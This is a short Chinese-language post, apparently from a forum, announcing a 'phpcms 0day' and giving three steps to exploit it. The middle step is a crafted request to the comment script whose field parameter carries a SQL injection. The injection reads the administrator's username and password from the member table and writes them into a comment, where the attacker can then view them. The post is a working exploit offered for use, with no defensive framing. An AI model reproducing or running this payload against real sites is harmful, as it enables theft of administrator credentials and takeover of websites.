phpcms 0day

1、找到任意一篇文章发表评论并得到评论ID

2、提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote 红色替换为评论ID

3、重新查看评论

TXT留在桌面N久了 一直没测试 就甩出来吧 可能市面上已有，所以请不要JJYY